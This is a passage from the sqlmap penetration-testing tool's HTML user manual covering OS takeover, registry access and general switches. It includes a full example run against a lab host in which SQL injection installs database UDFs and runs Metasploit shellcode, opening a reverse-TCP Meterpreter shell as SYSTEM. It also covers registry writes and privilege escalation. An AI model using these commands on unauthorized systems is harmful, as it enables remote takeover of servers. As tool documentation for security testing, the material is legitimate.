slide deck
|
|
<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
|
|
|
|
<P>Example against a MySQL target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn \
|
|
--msf-path /software/metasploit
|
|
|
|
[...]
|
|
[hh:mm:31] [INFO] the back-end DBMS is MySQL
|
|
web server operating system: Windows 2003
|
|
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
|
|
back-end DBMS: MySQL 5.0
|
|
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
|
|
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
|
|
how do you want to establish the tunnel?
|
|
[1] TCP: Metasploit Framework (default)
|
|
[2] ICMP: icmpsh - ICMP tunneling
|
|
>
|
|
[hh:mm:32] [INFO] testing if current user is DBA
|
|
[hh:mm:32] [INFO] fetching current user
|
|
what is the back-end database management system architecture?
|
|
[1] 32-bit (default)
|
|
[2] 64-bit
|
|
>
|
|
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
|
|
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
|
|
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
|
|
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
|
|
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
|
|
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
|
|
how do you want to execute the Metasploit shellcode on the back-end database underlying
|
|
operating system?
|
|
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
|
|
[2] Stand-alone payload stager (file system way)
|
|
>
|
|
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
|
|
which connection type do you want to use?
|
|
[1] Reverse TCP: Connect back from the database host to this machine (default)
|
|
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
|
|
between the specified and 65535
|
|
[3] Bind TCP: Listen on the database host for a connection
|
|
>
|
|
which is the local address? [192.168.136.1]
|
|
which local port number do you want to use? [60641]
|
|
which payload do you want to use?
|
|
[1] Meterpreter (default)
|
|
[2] Shell
|
|
[3] VNC
|
|
>
|
|
[hh:mm:40] [INFO] creation in progress ... done
|
|
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
|
|
|
|
_
|
|
| | o
|
|
_ _ _ _ _|_ __, , _ | | __ _|_
|
|
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
|
|
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
|
|
/|
|
|
\|
|
|
|
|
|
|
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
|
|
+ -- --=[ 674 exploits - 351 auxiliary
|
|
+ -- --=[ 217 payloads - 27 encoders - 8 nops
|
|
=[ svn r12272 updated 4 days ago (2011.04.07)
|
|
|
|
PAYLOAD => windows/meterpreter/reverse_tcp
|
|
EXITFUNC => thread
|
|
LPORT => 60641
|
|
LHOST => 192.168.136.1
|
|
[*] Started reverse handler on 192.168.136.1:60641
|
|
[*] Starting the payload handler...
|
|
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
|
|
please wait..
|
|
[*] Sending stage (749056 bytes) to 192.168.136.129
|
|
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
|
|
hh:mm:52 +0100 2011
|
|
|
|
meterpreter > Loading extension espia...success.
|
|
meterpreter > Loading extension incognito...success.
|
|
meterpreter > [-] The 'priv' extension has already been loaded.
|
|
meterpreter > Loading extension sniffer...success.
|
|
meterpreter > System Language : en_US
|
|
OS : Windows .NET Server (Build 3790, Service Pack 2).
|
|
Computer : W2K3R2
|
|
Architecture : x86
|
|
Meterpreter : x86/win32
|
|
meterpreter > Server username: NT AUTHORITY\SYSTEM
|
|
meterpreter > ipconfig
|
|
|
|
MS TCP Loopback interface
|
|
Hardware MAC: 00:00:00:00:00:00
|
|
IP Address : 127.0.0.1
|
|
Netmask : 255.0.0.0
|
|
|
|
|
|
|
|
Intel(R) PRO/1000 MT Network Connection
|
|
Hardware MAC: 00:0c:29:fc:79:39
|
|
IP Address : 192.168.136.129
|
|
Netmask : 255.255.255.0
|
|
|
|
|
|
meterpreter > exit
|
|
|
|
[*] Meterpreter session 1 closed. Reason: User exit
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>By default MySQL on Windows runs as <CODE>SYSTEM</CODE>, however PostgreSQL
|
|
runs as a low-privileged user <CODE>postgres</CODE> on both Windows and Linux.
|
|
Microsoft SQL Server 2000 by default runs as <CODE>SYSTEM</CODE>, whereas
|
|
Microsoft SQL Server 2005 and 2008 run most of the times as <CODE>NETWORK
|
|
SERVICE</CODE> and sometimes as <CODE>LOCAL SERVICE</CODE>.</P>
|
|
|
|
<P>It is possible to provide sqlmap with the <CODE>-</CODE><CODE>-priv-esc</CODE>
|
|
switch to perform a <B>database process' user privilege escalation</B>
|
|
via Metasploit's <CODE>getsystem</CODE> command which include, among others,
|
|
the
|
|
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>).</P>
|
|
|
|
|
|
<H2><A NAME="ss5.14">5.14</A> <A HREF="#toc5.14">Windows registry access</A>
|
|
</H2>
|
|
|
|
<P>It is possible to access Windows registry when the back-end database
|
|
management system is either MySQL, PostgreSQL or Microsoft SQL Server,
|
|
and when the web application supports stacked queries. Also, session user
|
|
has to have the needed privileges to access it.</P>
|
|
|
|
<H3>Read a Windows registry key value</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-reg-read</CODE></P>
|
|
|
|
<P>Using this option you can read registry key values.</P>
|
|
|
|
<H3>Write a Windows registry key value</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-reg-add</CODE></P>
|
|
|
|
<P>Using this option you can write registry key values.</P>
|
|
|
|
<H3>Delete a Windows registry key</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-reg-del</CODE></P>
|
|
|
|
<P>Using this option you can delete registry keys.</P>
|
|
|
|
<H3>Auxiliary registry switches</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>,
|
|
<CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
|
|
|
|
<P>These switches can be used to provide data needed for proper running of
|
|
options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE> and
|
|
<CODE>-</CODE><CODE>-reg-del</CODE>. So, instead of providing registry key
|
|
information when asked, you can use them at command prompt as program
|
|
arguments.</P>
|
|
|
|
<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used Windows registry
|
|
key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item name inside
|
|
provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value data, while with
|
|
<CODE>-</CODE><CODE>-reg-type</CODE> option you specify type of the value item.</P>
|
|
|
|
<P>A sample command line for adding a registry key hive follows:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
|
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss5.15">5.15</A> <A HREF="#toc5.15">General</A>
|
|
</H2>
|
|
|
|
<H3>Log HTTP(s) traffic to a textual file</H3>
|
|
|
|
<P>Switch: <CODE>-t</CODE></P>
|
|
|
|
<P>This switch requires an argument that specified the textual file to write
|
|
all HTTP(s) traffic generated by sqlmap - HTTP(s) requests and HTTP(s)
|
|
responses.</P>
|
|
|
|
<P>This is useful primarily for debug purposes.</P>
|
|
|
|
|
|
<H3>Session file: save and resume data retrieved</H3>
|
|
|
|
<P>Switch: <CODE>-s</CODE></P>
|
|
|
|
<P>By default sqlmap logs all queries and their output into a textual file
|
|
called <EM>session file</EM>, regardless of the technique used to extract
|
|
the data.
|
|
This is useful if you stop the injection for any reason and rerun it
|
|
afterwards: sqlmap will parse the session file and resume enumerated data
|
|
from it, then carry on extracting data from the exact point where it left
|
|
before you stopped the tool.</P>
|
|
|
|
<P>The default session file is <CODE>output/TARGET_URL/session</CODE>, but you
|
|
can specify a different file path with <CODE>-s</CODE> switch.</P>
|
|
|
|
<P>The session file has the following structure:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
[hh:mm:ss MM/DD/YY]
|
|
[Target URL][Injection point][Parameters][Query or information name][Query output or value]
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>A more user friendly textual file where all data retrieved is saved, is
|
|
the <EM>log file</EM>, <CODE>output/TARGET_URL/log</CODE>. This file can be
|
|
useful to see all information enumerated to the end.</P>
|
|
|
|
|
|
<H3>Flush session file</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-flush-session</CODE></P>
|
|
|
|
<P>As you are already familiar with the concept of a session file from the
|
|
description above, it is good to know that you can flush the content of
|
|
that file using option <CODE>-</CODE><CODE>-flush-session</CODE>.
|
|
This way you can avoid the caching mechanisms implemented by default in
|
|
sqlmap. Other possible way is to manually remove the session file(s).</P>
|
|
|
|
|
|
<H3>Ignores query results stored in session file</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-fresh-queries</CODE></P>
|
|
|
|
<P>As you are already familiar with the concept of a session file from the
|
|
description above, it is good to know that you can ignore the content of
|
|
that file using option <CODE>-</CODE><CODE>-fresh-queries</CODE>.
|
|
This way you can keep the session file untouched and for a selected run,
|
|
avoid the resuming/restoring of queries output.</P>
|
|
|
|
|
|
<H3>Estimated time of arrival</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-eta</CODE></P>
|
|
|
|
<P>It is possible to calculate and show in real time the estimated time of
|
|
arrival to retrieve each query output. This is shown when the technique
|
|
used to retrieve the output is any of the blind SQL injection types.</P>
|
|
|
|
<P>Example against an Oracle target affected only by boolean-based blind SQL
|
|
injection:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
|
|
|
|
[...]
|
|
[hh:mm:01] [INFO] the back-end DBMS is Oracle
|
|
[hh:mm:01] [INFO] fetching banner
|
|
[hh:mm:01] [INFO] retrieving the length of query output
|
|
[hh:mm:01] [INFO] retrieved: 64
|
|
17% [========> ] 11/64 ETA 00:19
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>Then:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
100% [===================================================] 64/64
|
|
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
|
|
|
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
|
back-end DBMS: Oracle
|
|
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>As you can see, sqlmap first calculates the length of the query output,
|
|
then estimates the time of arrival, shows the progress in percentage and
|
|
counts the number of retrieved output characters.</P>
|
|
|
|
|
|
<H3>Update sqlmap</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-update</CODE></P>
|
|
|
|
<P>Using this option you can update the tool to the latest development
|
|
version directly from the subversion repository. You obviously need
|
|
Internet access.</P>
|
|
|
|
<P>If, for any reason, this operation fails, run <CODE>git pull</CODE> from
|
|
your sqlmap working copy. It will perform the exact same operation of
|
|
switch <CODE>-</CODE><CODE>-update</CODE>.
|
|
If you are running sqlmap on Windows, you can use the
|
|
<A HREF="http://www.syntevo.com/smartgit/index.html">SmartGit</A> client.</P>
|
|
|
|
<P>This is strongly recommended <B>before</B> reporting any bug to the
|
|
<A HREF="http://www.sqlmap.org/#ml">mailing lists</A>.</P>
|
|
|
|
|
|
<H3>Save options in a configuration INI file</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-save</CODE></P>
|
|
|
|
<P>It is possible to save the command line options to a configuration INI
|
|
file.
|
|
The generated file can then be edited and passed to sqlmap with the
|
|
<CODE>-c</CODE> option as explained above.</P>
|
|
|
|
|
|
<H3>Act in non-interactive mode</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-batch</CODE></P>
|
|
|
|
<P>If you want sqlmap to run as a batch tool, without any user's interaction
|
|
when sqlmap requires it, you can force that by using
|
|
<CODE>-</CODE><CODE>-batch</CODE> switch. This will leave sqlmap to go with a
|
|
default behaviour whenever user's input would be required.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.16">5.16</A> <A HREF="#toc5.16">Miscellaneous</A>
|
|
</H2>
|
|
|
|
<H3>Alert when a SQL injection is detected</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-beep</CODE></P>
|
|
|
|
<P>When this switch is provided, sqlmap will beep at every new SQL injection
|
|
that it finds. It can be useful when you are processing in batch mode a
|
|
Google dork output or a proxy log file so that you do not need to monitor
|
|
the terminal constantly.</P>
|
|
|
|
|
|
<H3>IDS detection testing of injection payloads</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-check-payload</CODE></P>
|
|
|
|
<P>Curious to see if a
|
|
<A HREF="http://www.phpids.org">decent intrusion detection system</A> (IDS) picks up sqlmap payloads?
|
|
Use this switch!</P>
|
|
|
|
|
|
<H3>Cleanup the DBMS from sqlmap specific UDF(s) and table(s)</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-cleanup</CODE></P>
|
|
|
|
<P>It is recommended to clean up the back-end database management system from
|
|
sqlmap temporary table(s) and created user-defined function(s) when you
|
|
are done taking over the underlying operating system or file system.
|
|
Switch <CODE>-</CODE><CODE>-cleanup</CODE> will attempt to clean up the DBMS and
|
|
the file system wherever possible.</P>
|
|
|
|
|
|
<H3>Parse and test forms' input fields</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-forms</CODE></P>
|
|
|
|
<P>Say that you want to test against SQL injections a huge <EM>search form</EM>
|
|
or you want to test a login bypass (typically only two input fields named
|
|
like <EM>username</EM> and <EM>password</EM>), you can either pass to sqlmap
|
|
the request in a request file (<CODE>-r</CODE>), set the POSTed data
|
|
accordingly (<CODE>-</CODE><CODE>-data</CODE>) or let sqlmap do it for you!</P>
|
|
|
|
<P>Both of the above mentioned instances, and many others, appear as
|
|
<CODE><form></CODE> and <CODE><input></CODE> tags in HTML response
|
|
bodies and this is where this switch comes into play.</P>
|
|
|
|
<P>Provide sqlmap with <CODE>-</CODE><CODE>-forms</CODE> as well as the page where
|
|
the form can be found as the target url (<CODE>-u</CODE>) and sqlmap will
|
|
request the target url for you, parse the forms it has and guide you
|
|
through to test for SQL injection on those form input fields (parameters)
|
|
rather than the target url provided.</P>
|
|
|
|
|
|
<H3>Use Google dork results from specified page number</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-gpage</CODE></P>
|
|
|
|
<P>Default sqlmap behavior with option <CODE>-g</CODE> is to do a Google
|
|
search and use the first 100 resulting URLs for further SQL injection
|
|
testing. However, in combination with this option you can specify with
|
|
this switch, <CODE>-</CODE><CODE>-gpage</CODE>, some page other than the first one
|
|
to retrieve target URLs from.</P>
|
|
|
|
|
|
<H3>Imitate smartphone</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-mobile</CODE></P>
|
|
|
|
<P>TODO</P>
|
|
|
|
|
|
<H3>Display page rank (PR) for Google dork results</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-page-rank</CODE></P>
|
|
|
|
<P>Performs further requests to Google when <CODE>-g</CODE> is provided and
|
|
display page rank (PR) for Google dork results.</P>
|
|
|
|
|
|
<H3>Parse DBMS error messages from response pages</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-parse-errors</CODE></P>
|
|
|
|
<P>If the web application is configured in debug mode so that it displays
|
|
in the HTTP responses the back-end database management system error
|
|
messages, sqlmap can parse and display them for you.</P>
|
|
<P>This is useful for debugging purposes like understanding why a certain
|
|
enumeration or takeover switch does not work - it might be a matter of
|
|
session user's privileges and in this case you would see a DBMS error
|
|
message along the lines of <CODE>Access denied for user <SESSION
|
|
USER></CODE>.</P>
|
|
|
|
|
|
<H3>Replicate dumped data into a sqlite3 database</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-replicate</CODE></P>
|
|
|
|
<P>If you want to store in a local SQLite 3 database file each dumped table
|
|
(<CODE>-</CODE><CODE>-dump</CODE> or <CODE>-</CODE><CODE>-dump-all</CODE>), you can
|
|
provide sqlmap with the <CODE>-</CODE><CODE>-replicate</CODE> switch at dump
|
|
phase. This will create a <CODE><TABLE_NAME>.sqlite3</CODE> rather than
|
|
a <CODE><DB_NAME>/<TABLE_NAME>.csv</CODE> file into
|
|
<CODE>output/TARGET_URL/dump/</CODE> directory.</P>
|
|
|
|
<P>You can then use sqlmap itself to read and query the locally created
|
|
SQLite 3 file. For instance, <CODE>python sqlmap.py -d
|
|
sqlite:///software/sqlmap/output/192.168.136.131/dump/testdb.sqlite3 --table</CODE>.</P>
|
|
|
|
|
|
<H3>Simple wizard interface for beginner users</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-wizard</CODE></P>
|
|
|
|
<P>Do you really want to know?</P>
|
|
|
|
|
|
<H2><A NAME="s6">6.</A> <A HREF="#toc6">License and copyright</A></H2>
|
|
|
|
<P>sqlmap is released under the terms of the
|
|
<A HREF="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html">General Public License v2</A>.
|
|
sqlmap is copyrighted by its
|
|
<A HREF="http://www.sqlmap.org/#developers">developers</A>.</P>
|
|
|
|
|
|
<H2><A NAME="s7">7.</A> <A HREF="#toc7">Disclaimer</A></H2>
|
|
|
|
<P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
details.</P>
|
|
|
|
<P>Whatever you do with this tool is uniquely your responsibility. If you are
|
|
not authorized to punch holes in the network you are attacking be aware
|
|
that such action might get you in trouble with a lot of law enforcement
|
|
agencies.</P>
|
|
|
|
|
|
<H2><A NAME="s8">8.</A> <A HREF="#toc8">Authors</A></H2>
|
|
|
|
<P>
|
|
<A HREF="mailto:bernardo@sqlmap.org">Bernardo Damele A. G.</A> (inquis)</P>
|
|
<P>
|
|
<A HREF="mailto:miroslav@sqlmap.org">Miroslav Stampar</A> (stamparm)</P>
|
|
|
|
</BODY>
|
|
</HTML>
|